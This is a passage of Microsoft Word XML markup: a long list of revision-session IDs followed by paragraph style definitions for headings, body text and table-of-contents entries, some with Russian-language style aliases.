    <w:rsid w:val="00B977DA"/>
    <w:rsid w:val="00BA00A8"/>
    <w:rsid w:val="00BA1634"/>
    <w:rsid w:val="00BA1F4F"/>
    <w:rsid w:val="00BA22F6"/>
    <w:rsid w:val="00BA2D81"/>
    <w:rsid w:val="00BA3462"/>
    <w:rsid w:val="00BA59D1"/>
    <w:rsid w:val="00BB0BBA"/>
    <w:rsid w:val="00BB10FA"/>
    <w:rsid w:val="00BB12A1"/>
    <w:rsid w:val="00BB22F1"/>
    <w:rsid w:val="00BB29E8"/>
    <w:rsid w:val="00BB347C"/>
    <w:rsid w:val="00BB3E20"/>
    <w:rsid w:val="00BB5478"/>
    <w:rsid w:val="00BB57E0"/>
    <w:rsid w:val="00BB6471"/>
    <w:rsid w:val="00BB7A79"/>
    <w:rsid w:val="00BC2500"/>
    <w:rsid w:val="00BC2F2F"/>
    <w:rsid w:val="00BC3744"/>
    <w:rsid w:val="00BC5487"/>
    <w:rsid w:val="00BC5E2B"/>
    <w:rsid w:val="00BC7D1C"/>
    <w:rsid w:val="00BD03A4"/>
    <w:rsid w:val="00BD28F3"/>
    <w:rsid w:val="00BD4C3F"/>
    <w:rsid w:val="00BD4EB1"/>
    <w:rsid w:val="00BD5AEB"/>
    <w:rsid w:val="00BD6A5C"/>
    <w:rsid w:val="00BE28B4"/>
    <w:rsid w:val="00BE2E0B"/>
    <w:rsid w:val="00BE304C"/>
    <w:rsid w:val="00BE421B"/>
    <w:rsid w:val="00BE486D"/>
    <w:rsid w:val="00BE672F"/>
    <w:rsid w:val="00BE7926"/>
    <w:rsid w:val="00BF307F"/>
    <w:rsid w:val="00BF3E26"/>
    <w:rsid w:val="00BF48C8"/>
    <w:rsid w:val="00BF512D"/>
    <w:rsid w:val="00BF5E22"/>
    <w:rsid w:val="00BF6463"/>
    <w:rsid w:val="00BF796C"/>
    <w:rsid w:val="00C016CC"/>
    <w:rsid w:val="00C02AF6"/>
    <w:rsid w:val="00C02CC2"/>
    <w:rsid w:val="00C0341B"/>
    <w:rsid w:val="00C0343D"/>
    <w:rsid w:val="00C036DE"/>
    <w:rsid w:val="00C03B9E"/>
    <w:rsid w:val="00C04D73"/>
    <w:rsid w:val="00C04E82"/>
    <w:rsid w:val="00C053DD"/>
    <w:rsid w:val="00C053E6"/>
    <w:rsid w:val="00C07D67"/>
    <w:rsid w:val="00C1129C"/>
    <w:rsid w:val="00C11A41"/>
    <w:rsid w:val="00C12715"/>
    <w:rsid w:val="00C13EEC"/>
    <w:rsid w:val="00C1478D"/>
    <w:rsid w:val="00C14FED"/>
    <w:rsid w:val="00C150DD"/>
    <w:rsid w:val="00C158B7"/>
    <w:rsid w:val="00C1617A"/>
    <w:rsid w:val="00C17F0E"/>
    <w:rsid w:val="00C200FE"/>
    <w:rsid w:val="00C20EEE"/>
    <w:rsid w:val="00C215B3"/>
    <w:rsid w:val="00C2179D"/>
    <w:rsid w:val="00C23DF8"/>
    <w:rsid w:val="00C243F3"/>
    <w:rsid w:val="00C250C0"/>
    <w:rsid w:val="00C2575E"/>
    <w:rsid w:val="00C25BDB"/>
    <w:rsid w:val="00C267D4"/>
    <w:rsid w:val="00C26B23"/>
    <w:rsid w:val="00C272B6"/>
    <w:rsid w:val="00C273DA"/>
    <w:rsid w:val="00C30D82"/>
    <w:rsid w:val="00C316D9"/>
    <w:rsid w:val="00C33143"/>
    <w:rsid w:val="00C34198"/>
    <w:rsid w:val="00C36234"/>
    <w:rsid w:val="00C3692D"/>
    <w:rsid w:val="00C3720C"/>
    <w:rsid w:val="00C37310"/>
    <w:rsid w:val="00C400B0"/>
    <w:rsid w:val="00C40545"/>
    <w:rsid w:val="00C408E4"/>
    <w:rsid w:val="00C410F2"/>
    <w:rsid w:val="00C415DC"/>
    <w:rsid w:val="00C424D2"/>
    <w:rsid w:val="00C431D1"/>
    <w:rsid w:val="00C43518"/>
    <w:rsid w:val="00C4359A"/>
    <w:rsid w:val="00C43AAB"/>
    <w:rsid w:val="00C441D6"/>
    <w:rsid w:val="00C44A57"/>
    <w:rsid w:val="00C462B5"/>
    <w:rsid w:val="00C47059"/>
    <w:rsid w:val="00C50219"/>
    <w:rsid w:val="00C50F59"/>
    <w:rsid w:val="00C602AE"/>
    <w:rsid w:val="00C60EAD"/>
    <w:rsid w:val="00C61A33"/>
    <w:rsid w:val="00C61B54"/>
    <w:rsid w:val="00C63158"/>
    <w:rsid w:val="00C631E2"/>
    <w:rsid w:val="00C63633"/>
    <w:rsid w:val="00C63979"/>
    <w:rsid w:val="00C63E2D"/>
    <w:rsid w:val="00C64183"/>
    <w:rsid w:val="00C64252"/>
    <w:rsid w:val="00C66C9D"/>
    <w:rsid w:val="00C675EF"/>
    <w:rsid w:val="00C718A9"/>
    <w:rsid w:val="00C725C0"/>
    <w:rsid w:val="00C747BF"/>
    <w:rsid w:val="00C74BF2"/>
    <w:rsid w:val="00C74D22"/>
    <w:rsid w:val="00C74FDA"/>
    <w:rsid w:val="00C7523C"/>
    <w:rsid w:val="00C75F18"/>
    <w:rsid w:val="00C76D8F"/>
    <w:rsid w:val="00C806B8"/>
    <w:rsid w:val="00C806CC"/>
    <w:rsid w:val="00C81422"/>
    <w:rsid w:val="00C826BE"/>
    <w:rsid w:val="00C835EB"/>
    <w:rsid w:val="00C83C83"/>
    <w:rsid w:val="00C84999"/>
    <w:rsid w:val="00C85019"/>
    <w:rsid w:val="00C8731D"/>
    <w:rsid w:val="00C8756E"/>
    <w:rsid w:val="00C87700"/>
    <w:rsid w:val="00C90B8B"/>
    <w:rsid w:val="00C9318C"/>
    <w:rsid w:val="00C9389E"/>
    <w:rsid w:val="00C95B43"/>
    <w:rsid w:val="00C96470"/>
    <w:rsid w:val="00C96712"/>
    <w:rsid w:val="00CA06B3"/>
    <w:rsid w:val="00CA0977"/>
    <w:rsid w:val="00CA1B83"/>
    <w:rsid w:val="00CA3136"/>
    <w:rsid w:val="00CA3C7B"/>
    <w:rsid w:val="00CA3E4C"/>
    <w:rsid w:val="00CA4292"/>
    <w:rsid w:val="00CA5A2E"/>
    <w:rsid w:val="00CA5BBC"/>
    <w:rsid w:val="00CA5BE9"/>
    <w:rsid w:val="00CA691D"/>
    <w:rsid w:val="00CA6C1C"/>
    <w:rsid w:val="00CA6FE4"/>
    <w:rsid w:val="00CA7C12"/>
    <w:rsid w:val="00CA7F8E"/>
    <w:rsid w:val="00CB53A6"/>
    <w:rsid w:val="00CB5AA4"/>
    <w:rsid w:val="00CB727C"/>
    <w:rsid w:val="00CB7955"/>
    <w:rsid w:val="00CB7BF5"/>
    <w:rsid w:val="00CB7D0A"/>
    <w:rsid w:val="00CC081B"/>
    <w:rsid w:val="00CC25CC"/>
    <w:rsid w:val="00CC5044"/>
    <w:rsid w:val="00CC559F"/>
    <w:rsid w:val="00CC6714"/>
    <w:rsid w:val="00CC7460"/>
    <w:rsid w:val="00CC77F3"/>
    <w:rsid w:val="00CD121F"/>
    <w:rsid w:val="00CD1DE8"/>
    <w:rsid w:val="00CD1ED1"/>
    <w:rsid w:val="00CD2351"/>
    <w:rsid w:val="00CD2AAD"/>
    <w:rsid w:val="00CD5EEF"/>
    <w:rsid w:val="00CD6309"/>
    <w:rsid w:val="00CD6C24"/>
    <w:rsid w:val="00CE092D"/>
    <w:rsid w:val="00CE3A36"/>
    <w:rsid w:val="00CE5BEB"/>
    <w:rsid w:val="00CF1583"/>
    <w:rsid w:val="00CF171C"/>
    <w:rsid w:val="00CF3A1C"/>
    <w:rsid w:val="00CF7F3E"/>
    <w:rsid w:val="00D008D0"/>
    <w:rsid w:val="00D00A27"/>
    <w:rsid w:val="00D02572"/>
    <w:rsid w:val="00D0260E"/>
    <w:rsid w:val="00D026C0"/>
    <w:rsid w:val="00D0375C"/>
    <w:rsid w:val="00D03A7E"/>
    <w:rsid w:val="00D0416D"/>
    <w:rsid w:val="00D0492C"/>
    <w:rsid w:val="00D05199"/>
    <w:rsid w:val="00D0625D"/>
    <w:rsid w:val="00D06C24"/>
    <w:rsid w:val="00D07135"/>
    <w:rsid w:val="00D07EF3"/>
    <w:rsid w:val="00D103E0"/>
    <w:rsid w:val="00D15C92"/>
    <w:rsid w:val="00D170F0"/>
    <w:rsid w:val="00D20248"/>
    <w:rsid w:val="00D21574"/>
    <w:rsid w:val="00D23392"/>
    <w:rsid w:val="00D24469"/>
    <w:rsid w:val="00D2512E"/>
    <w:rsid w:val="00D25A62"/>
    <w:rsid w:val="00D26145"/>
    <w:rsid w:val="00D26F59"/>
    <w:rsid w:val="00D30702"/>
    <w:rsid w:val="00D30A9F"/>
    <w:rsid w:val="00D31F0A"/>
    <w:rsid w:val="00D32019"/>
    <w:rsid w:val="00D321E7"/>
    <w:rsid w:val="00D33279"/>
    <w:rsid w:val="00D344B9"/>
    <w:rsid w:val="00D34701"/>
    <w:rsid w:val="00D35F1D"/>
    <w:rsid w:val="00D364C5"/>
    <w:rsid w:val="00D3687A"/>
    <w:rsid w:val="00D405D7"/>
    <w:rsid w:val="00D409BE"/>
    <w:rsid w:val="00D40D9E"/>
    <w:rsid w:val="00D40F8A"/>
    <w:rsid w:val="00D41D31"/>
    <w:rsid w:val="00D42984"/>
    <w:rsid w:val="00D43B4C"/>
    <w:rsid w:val="00D44B1E"/>
    <w:rsid w:val="00D45822"/>
    <w:rsid w:val="00D4779B"/>
    <w:rsid w:val="00D50C37"/>
    <w:rsid w:val="00D53930"/>
    <w:rsid w:val="00D56B80"/>
    <w:rsid w:val="00D57A11"/>
    <w:rsid w:val="00D57E13"/>
    <w:rsid w:val="00D6051A"/>
    <w:rsid w:val="00D606F2"/>
    <w:rsid w:val="00D60E1A"/>
    <w:rsid w:val="00D61092"/>
    <w:rsid w:val="00D610A1"/>
    <w:rsid w:val="00D621BD"/>
    <w:rsid w:val="00D6224E"/>
    <w:rsid w:val="00D62526"/>
    <w:rsid w:val="00D629D6"/>
    <w:rsid w:val="00D63963"/>
    <w:rsid w:val="00D63AD4"/>
    <w:rsid w:val="00D63E17"/>
    <w:rsid w:val="00D652E3"/>
    <w:rsid w:val="00D661B0"/>
    <w:rsid w:val="00D662F7"/>
    <w:rsid w:val="00D70209"/>
    <w:rsid w:val="00D707A0"/>
    <w:rsid w:val="00D70A93"/>
    <w:rsid w:val="00D70D24"/>
    <w:rsid w:val="00D71A7A"/>
    <w:rsid w:val="00D72373"/>
    <w:rsid w:val="00D7329A"/>
    <w:rsid w:val="00D763A5"/>
    <w:rsid w:val="00D76B9E"/>
    <w:rsid w:val="00D77AC5"/>
    <w:rsid w:val="00D8138D"/>
    <w:rsid w:val="00D83040"/>
    <w:rsid w:val="00D86389"/>
    <w:rsid w:val="00D909B0"/>
    <w:rsid w:val="00D929FA"/>
    <w:rsid w:val="00D92D09"/>
    <w:rsid w:val="00D93ECC"/>
    <w:rsid w:val="00D94D94"/>
    <w:rsid w:val="00D953F3"/>
    <w:rsid w:val="00D958A2"/>
    <w:rsid w:val="00D97825"/>
    <w:rsid w:val="00DA0D38"/>
    <w:rsid w:val="00DA0E90"/>
    <w:rsid w:val="00DA44A2"/>
    <w:rsid w:val="00DA6B09"/>
    <w:rsid w:val="00DA7B8A"/>
    <w:rsid w:val="00DB00B4"/>
    <w:rsid w:val="00DB1875"/>
    <w:rsid w:val="00DB2BBE"/>
    <w:rsid w:val="00DB334F"/>
    <w:rsid w:val="00DB3EF7"/>
    <w:rsid w:val="00DB4101"/>
    <w:rsid w:val="00DB4AE8"/>
    <w:rsid w:val="00DB514B"/>
    <w:rsid w:val="00DB6CC7"/>
    <w:rsid w:val="00DB6E34"/>
    <w:rsid w:val="00DB761D"/>
    <w:rsid w:val="00DB7C0A"/>
    <w:rsid w:val="00DC0AEC"/>
    <w:rsid w:val="00DC52B4"/>
    <w:rsid w:val="00DC5744"/>
    <w:rsid w:val="00DC5EF5"/>
    <w:rsid w:val="00DC69A2"/>
    <w:rsid w:val="00DD018E"/>
    <w:rsid w:val="00DD04CB"/>
    <w:rsid w:val="00DD405A"/>
    <w:rsid w:val="00DD4217"/>
    <w:rsid w:val="00DD6208"/>
    <w:rsid w:val="00DD7DB6"/>
    <w:rsid w:val="00DE17C0"/>
    <w:rsid w:val="00DE221D"/>
    <w:rsid w:val="00DE4508"/>
    <w:rsid w:val="00DE48E4"/>
    <w:rsid w:val="00DE49DF"/>
    <w:rsid w:val="00DE4F0E"/>
    <w:rsid w:val="00DE5E56"/>
    <w:rsid w:val="00DE6436"/>
    <w:rsid w:val="00DE6BFC"/>
    <w:rsid w:val="00DF2F0C"/>
    <w:rsid w:val="00DF4AF7"/>
    <w:rsid w:val="00DF6189"/>
    <w:rsid w:val="00DF672F"/>
    <w:rsid w:val="00DF6A4A"/>
    <w:rsid w:val="00DF7930"/>
    <w:rsid w:val="00E01F6E"/>
    <w:rsid w:val="00E029E5"/>
    <w:rsid w:val="00E03D06"/>
    <w:rsid w:val="00E05B15"/>
    <w:rsid w:val="00E060D4"/>
    <w:rsid w:val="00E06114"/>
    <w:rsid w:val="00E0630D"/>
    <w:rsid w:val="00E10AEF"/>
    <w:rsid w:val="00E1101D"/>
    <w:rsid w:val="00E123CD"/>
    <w:rsid w:val="00E124C9"/>
    <w:rsid w:val="00E129CE"/>
    <w:rsid w:val="00E139D9"/>
    <w:rsid w:val="00E14714"/>
    <w:rsid w:val="00E14ABC"/>
    <w:rsid w:val="00E14D74"/>
    <w:rsid w:val="00E167DE"/>
    <w:rsid w:val="00E20ED4"/>
    <w:rsid w:val="00E2134B"/>
    <w:rsid w:val="00E249D9"/>
    <w:rsid w:val="00E2657E"/>
    <w:rsid w:val="00E333EE"/>
    <w:rsid w:val="00E33627"/>
    <w:rsid w:val="00E342AF"/>
    <w:rsid w:val="00E36173"/>
    <w:rsid w:val="00E36381"/>
    <w:rsid w:val="00E37194"/>
    <w:rsid w:val="00E37491"/>
    <w:rsid w:val="00E40DD6"/>
    <w:rsid w:val="00E4329F"/>
    <w:rsid w:val="00E4552D"/>
    <w:rsid w:val="00E46285"/>
    <w:rsid w:val="00E4675D"/>
    <w:rsid w:val="00E46981"/>
    <w:rsid w:val="00E51870"/>
    <w:rsid w:val="00E51C15"/>
    <w:rsid w:val="00E52382"/>
    <w:rsid w:val="00E54245"/>
    <w:rsid w:val="00E55130"/>
    <w:rsid w:val="00E55860"/>
    <w:rsid w:val="00E57366"/>
    <w:rsid w:val="00E6194C"/>
    <w:rsid w:val="00E61DDD"/>
    <w:rsid w:val="00E63017"/>
    <w:rsid w:val="00E64024"/>
    <w:rsid w:val="00E64DF6"/>
    <w:rsid w:val="00E65E9B"/>
    <w:rsid w:val="00E66CD9"/>
    <w:rsid w:val="00E67999"/>
    <w:rsid w:val="00E70640"/>
    <w:rsid w:val="00E70C04"/>
    <w:rsid w:val="00E70DA1"/>
    <w:rsid w:val="00E70EC7"/>
    <w:rsid w:val="00E7330A"/>
    <w:rsid w:val="00E73901"/>
    <w:rsid w:val="00E75ED9"/>
    <w:rsid w:val="00E81F13"/>
    <w:rsid w:val="00E8209A"/>
    <w:rsid w:val="00E823B1"/>
    <w:rsid w:val="00E82F06"/>
    <w:rsid w:val="00E84C7E"/>
    <w:rsid w:val="00E84F0F"/>
    <w:rsid w:val="00E8630A"/>
    <w:rsid w:val="00E86488"/>
    <w:rsid w:val="00E8676A"/>
    <w:rsid w:val="00E8682F"/>
    <w:rsid w:val="00E86F3F"/>
    <w:rsid w:val="00E87E34"/>
    <w:rsid w:val="00E90B52"/>
    <w:rsid w:val="00E92233"/>
    <w:rsid w:val="00E95F01"/>
    <w:rsid w:val="00E9615B"/>
    <w:rsid w:val="00E973C4"/>
    <w:rsid w:val="00E97F48"/>
    <w:rsid w:val="00EA0C17"/>
    <w:rsid w:val="00EA12E4"/>
    <w:rsid w:val="00EA14F8"/>
    <w:rsid w:val="00EA1752"/>
    <w:rsid w:val="00EA1B28"/>
    <w:rsid w:val="00EA1D4B"/>
    <w:rsid w:val="00EA248E"/>
    <w:rsid w:val="00EA27A4"/>
    <w:rsid w:val="00EA306A"/>
    <w:rsid w:val="00EA3544"/>
    <w:rsid w:val="00EA60F1"/>
    <w:rsid w:val="00EA74EB"/>
    <w:rsid w:val="00EA7C9C"/>
    <w:rsid w:val="00EB0529"/>
    <w:rsid w:val="00EB095C"/>
    <w:rsid w:val="00EB0F0F"/>
    <w:rsid w:val="00EB2400"/>
    <w:rsid w:val="00EB29AC"/>
    <w:rsid w:val="00EB2D66"/>
    <w:rsid w:val="00EB4A14"/>
    <w:rsid w:val="00EB4A58"/>
    <w:rsid w:val="00EB590A"/>
    <w:rsid w:val="00EB5F50"/>
    <w:rsid w:val="00EB6E9D"/>
    <w:rsid w:val="00EB7E42"/>
    <w:rsid w:val="00EC1806"/>
    <w:rsid w:val="00EC1A29"/>
    <w:rsid w:val="00EC23A5"/>
    <w:rsid w:val="00EC23F3"/>
    <w:rsid w:val="00EC42B8"/>
    <w:rsid w:val="00EC4F47"/>
    <w:rsid w:val="00EC6C06"/>
    <w:rsid w:val="00EC7385"/>
    <w:rsid w:val="00EC7403"/>
    <w:rsid w:val="00ED3494"/>
    <w:rsid w:val="00ED5080"/>
    <w:rsid w:val="00ED50B4"/>
    <w:rsid w:val="00ED62C1"/>
    <w:rsid w:val="00ED7C3C"/>
    <w:rsid w:val="00EE03CB"/>
    <w:rsid w:val="00EE0B12"/>
    <w:rsid w:val="00EE0C8B"/>
    <w:rsid w:val="00EE0ECC"/>
    <w:rsid w:val="00EE2EEB"/>
    <w:rsid w:val="00EE38F5"/>
    <w:rsid w:val="00EE5242"/>
    <w:rsid w:val="00EE538B"/>
    <w:rsid w:val="00EE5892"/>
    <w:rsid w:val="00EE62A5"/>
    <w:rsid w:val="00EE763F"/>
    <w:rsid w:val="00EF11EC"/>
    <w:rsid w:val="00EF1225"/>
    <w:rsid w:val="00EF246D"/>
    <w:rsid w:val="00EF2915"/>
    <w:rsid w:val="00EF46D8"/>
    <w:rsid w:val="00EF70C7"/>
    <w:rsid w:val="00F0001D"/>
    <w:rsid w:val="00F01108"/>
    <w:rsid w:val="00F038E3"/>
    <w:rsid w:val="00F03F4E"/>
    <w:rsid w:val="00F0572A"/>
    <w:rsid w:val="00F065FB"/>
    <w:rsid w:val="00F06EAF"/>
    <w:rsid w:val="00F0747E"/>
    <w:rsid w:val="00F077FD"/>
    <w:rsid w:val="00F07C9E"/>
    <w:rsid w:val="00F10558"/>
    <w:rsid w:val="00F12440"/>
    <w:rsid w:val="00F13EF4"/>
    <w:rsid w:val="00F13F51"/>
    <w:rsid w:val="00F14293"/>
    <w:rsid w:val="00F1455E"/>
    <w:rsid w:val="00F14A0F"/>
    <w:rsid w:val="00F154A6"/>
    <w:rsid w:val="00F15941"/>
    <w:rsid w:val="00F20A39"/>
    <w:rsid w:val="00F21D48"/>
    <w:rsid w:val="00F22FD4"/>
    <w:rsid w:val="00F236D3"/>
    <w:rsid w:val="00F26037"/>
    <w:rsid w:val="00F2667B"/>
    <w:rsid w:val="00F26766"/>
    <w:rsid w:val="00F27B3A"/>
    <w:rsid w:val="00F27FB8"/>
    <w:rsid w:val="00F30BA6"/>
    <w:rsid w:val="00F31B34"/>
    <w:rsid w:val="00F31D8D"/>
    <w:rsid w:val="00F3492A"/>
    <w:rsid w:val="00F36375"/>
    <w:rsid w:val="00F43437"/>
    <w:rsid w:val="00F441BB"/>
    <w:rsid w:val="00F44EEA"/>
    <w:rsid w:val="00F45247"/>
    <w:rsid w:val="00F45354"/>
    <w:rsid w:val="00F45784"/>
    <w:rsid w:val="00F45994"/>
    <w:rsid w:val="00F46556"/>
    <w:rsid w:val="00F4727F"/>
    <w:rsid w:val="00F477F5"/>
    <w:rsid w:val="00F4798C"/>
    <w:rsid w:val="00F47C10"/>
    <w:rsid w:val="00F506BD"/>
    <w:rsid w:val="00F50F4B"/>
    <w:rsid w:val="00F51173"/>
    <w:rsid w:val="00F5147D"/>
    <w:rsid w:val="00F51E96"/>
    <w:rsid w:val="00F52B8D"/>
    <w:rsid w:val="00F52DEF"/>
    <w:rsid w:val="00F535A3"/>
    <w:rsid w:val="00F539B1"/>
    <w:rsid w:val="00F56412"/>
    <w:rsid w:val="00F6243A"/>
    <w:rsid w:val="00F62E0C"/>
    <w:rsid w:val="00F64E8D"/>
    <w:rsid w:val="00F65DFC"/>
    <w:rsid w:val="00F66197"/>
    <w:rsid w:val="00F66F67"/>
    <w:rsid w:val="00F67D05"/>
    <w:rsid w:val="00F700C6"/>
    <w:rsid w:val="00F7018B"/>
    <w:rsid w:val="00F70EB0"/>
    <w:rsid w:val="00F72E76"/>
    <w:rsid w:val="00F753CE"/>
    <w:rsid w:val="00F75C93"/>
    <w:rsid w:val="00F76EC1"/>
    <w:rsid w:val="00F76F59"/>
    <w:rsid w:val="00F77A34"/>
    <w:rsid w:val="00F77DFA"/>
    <w:rsid w:val="00F811B7"/>
    <w:rsid w:val="00F81B81"/>
    <w:rsid w:val="00F82A9D"/>
    <w:rsid w:val="00F8334F"/>
    <w:rsid w:val="00F84349"/>
    <w:rsid w:val="00F860E8"/>
    <w:rsid w:val="00F87163"/>
    <w:rsid w:val="00F87DE9"/>
    <w:rsid w:val="00F87EC9"/>
    <w:rsid w:val="00F90B5A"/>
    <w:rsid w:val="00F93512"/>
    <w:rsid w:val="00F94664"/>
    <w:rsid w:val="00F95B9F"/>
    <w:rsid w:val="00F9724C"/>
    <w:rsid w:val="00FA08BF"/>
    <w:rsid w:val="00FA0969"/>
    <w:rsid w:val="00FA1628"/>
    <w:rsid w:val="00FA169B"/>
    <w:rsid w:val="00FA2271"/>
    <w:rsid w:val="00FA26F4"/>
    <w:rsid w:val="00FA35AF"/>
    <w:rsid w:val="00FA4EC2"/>
    <w:rsid w:val="00FA57AA"/>
    <w:rsid w:val="00FA6CD7"/>
    <w:rsid w:val="00FA7C8D"/>
    <w:rsid w:val="00FB0550"/>
    <w:rsid w:val="00FB0C77"/>
    <w:rsid w:val="00FB1051"/>
    <w:rsid w:val="00FB268B"/>
    <w:rsid w:val="00FB2C90"/>
    <w:rsid w:val="00FB443C"/>
    <w:rsid w:val="00FB4E03"/>
    <w:rsid w:val="00FB63D0"/>
    <w:rsid w:val="00FB6792"/>
    <w:rsid w:val="00FB6BDB"/>
    <w:rsid w:val="00FC006D"/>
    <w:rsid w:val="00FC2AAF"/>
    <w:rsid w:val="00FC2F81"/>
    <w:rsid w:val="00FC4234"/>
    <w:rsid w:val="00FC4A04"/>
    <w:rsid w:val="00FC60DB"/>
    <w:rsid w:val="00FC7B33"/>
    <w:rsid w:val="00FD0353"/>
    <w:rsid w:val="00FD1CCA"/>
    <w:rsid w:val="00FD33B0"/>
    <w:rsid w:val="00FD3F48"/>
    <w:rsid w:val="00FE0750"/>
    <w:rsid w:val="00FE1BCD"/>
    <w:rsid w:val="00FE272B"/>
    <w:rsid w:val="00FE36AE"/>
    <w:rsid w:val="00FE43A3"/>
    <w:rsid w:val="00FE4743"/>
    <w:rsid w:val="00FE5408"/>
    <w:rsid w:val="00FE54CE"/>
    <w:rsid w:val="00FE5519"/>
    <w:rsid w:val="00FE5653"/>
    <w:rsid w:val="00FE5861"/>
    <w:rsid w:val="00FE5AFB"/>
    <w:rsid w:val="00FE5D43"/>
    <w:rsid w:val="00FE67C1"/>
    <w:rsid w:val="00FE6E1A"/>
    <w:rsid w:val="00FF0101"/>
    <w:rsid w:val="00FF2D6B"/>
    <w:rsid w:val="00FF361C"/>
    <w:rsid w:val="00FF69C4"/>
    <w:rsid w:val="00FF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0C36E95"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D215ED1-468B-44D7-9F4E-EAD767978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D3C"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="Заголовок раздела,H1,Заголовок 1 уровень,1 УРОВЕНЬ,Знак Знак,Знак3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00403A26"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="28"/>
      </w:numPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="H2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00403A26"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="28"/>
      </w:numPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="000907F3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="28"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00956819"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:ind w:left="1701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819"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="28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28"/>
      </w:numPr>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr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819"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2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819"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="2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819"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="2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684"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:firstLine="627"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:firstLine="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00015840"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10195"/>
      </w:tabs>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
      <w:noProof/>
      <w:sz w:val="28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677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
      <w:sz w:val="20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pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs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63672A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10195"/>
      </w:tabs>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0063672A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="403"/>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10195"/>
      </w:tabs>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
